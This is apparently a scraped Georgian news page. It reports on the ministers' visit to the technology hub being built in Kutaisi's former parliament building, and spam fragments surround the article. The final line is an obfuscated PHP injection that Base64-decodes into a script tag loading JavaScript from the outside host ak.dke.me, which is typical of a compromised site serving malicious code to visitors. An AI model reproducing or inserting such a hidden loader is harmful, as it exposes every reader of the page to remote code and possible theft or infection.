global distribution
გარე ავეჯი

ეკონომიკისა და მდგრადი განვითარების მინისტრი მარიამ ქვრივიშვილი ქუთაისში, პარლამენტის ყოფილ შენობაში ტექნოლოგიური ჰაბის განვითარების მიზნით მიმდინარე სამუშაოებს საქართველოს პრემიერ-მინისტრ ირაკლი კობახიძესთან ერთად გაეცნო.

სამინისტროს ინფორმაციით, ტექნოლოგიური ჰაბის პროექტზე მუშაობა ინტენსიურად მიმდინარეობს, როგორც შენობის შიდა სივრცეში, ისე გარე პერიმეტრზე. ინფრასტრუქტურული სამუშაოების დიდი ნაწილი უკვე დასრულებული, ან დასკვნით ფაზაშია – მიმდინარეობს გარე ტერიტორიის ინფრასტრუქტურის მოწყობა, სარწყავი სისტემის და სკვერის, ბილიკების, მწვანე საფარის და გარე განათების სამუშაოები. პროექტის თანახმად, ასევე მიმდინარეობს გათბობა-გაგრილების სისტემის და საინჟინრო კომუნიკაციების რეაბილიტაცია და ინფრასტრუქტურის მოწესრიგება შენობის გარე პერიმეტრზე და ა.შ.

როგორც ეკონომიკისა და მდგრადი განვითარების მინისტრმა აღნიშნა, პროექტის მიმდინარეობა და შესრულებული სამუშაოები უკვე იძლევა იმის თქმის საშუალებას, რომ ქუთაისის ტექნოლოგიური ჰაბი არა მხოლოდ საქართველოს, არამედ რეგიონული მასშტაბის და მნიშვნელობის მულტიფუნქციური სივრცე იქნება.

„ტექნოლოგიური ჰაბი უნიკალური სივრცე იქნება, სადაც თავის მოიყრის თანამედროვე ტექნოლოგიური ლაბორატორიები, იმუშავებს სასწავლო პროგრამები – საერთაშორისო IT და ტექნოლოგიური სკოლა. შედეგად, საქართველოს ექნება საერთაშორისო სტანდარტების შესაბამისი სივრცე ტექნოლოგიების განვითარებისა და ინოვაციური პროდუქტების მხარდასაჭერად. ეს იქნება რეგიონული მასშტაბის და მიზიდულობის ცენტრი, რომელიც მნიშვნელოვან როლს შეიტანს ზოგადად ქვეყნის ეკონომიკური განვითარების საქმეში“, – აღნიშნა ეკონომიკისა და მდგრადი განვითარების მინისტრმა.

უწყების ინფორმაციით, ტექნოლოგიური ჰაბის სივრცეში განთავსდება რამდენიმე მიმართულების ლაბორატორიები, ინტერაქციული სამეცნიერო ტექნოლოგიური მუზეუმი და ხელოვნური ინტელექტის ცენტრი. ლაბორატორიებისთვის საჭირო დანადგარების, მოწყობილობებისა და აღჭურვილობის ნაწილი უკვე დასაწყობებულია, ხოლო ნაწილი ტრანსპორტირების პროცესშია.

58
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");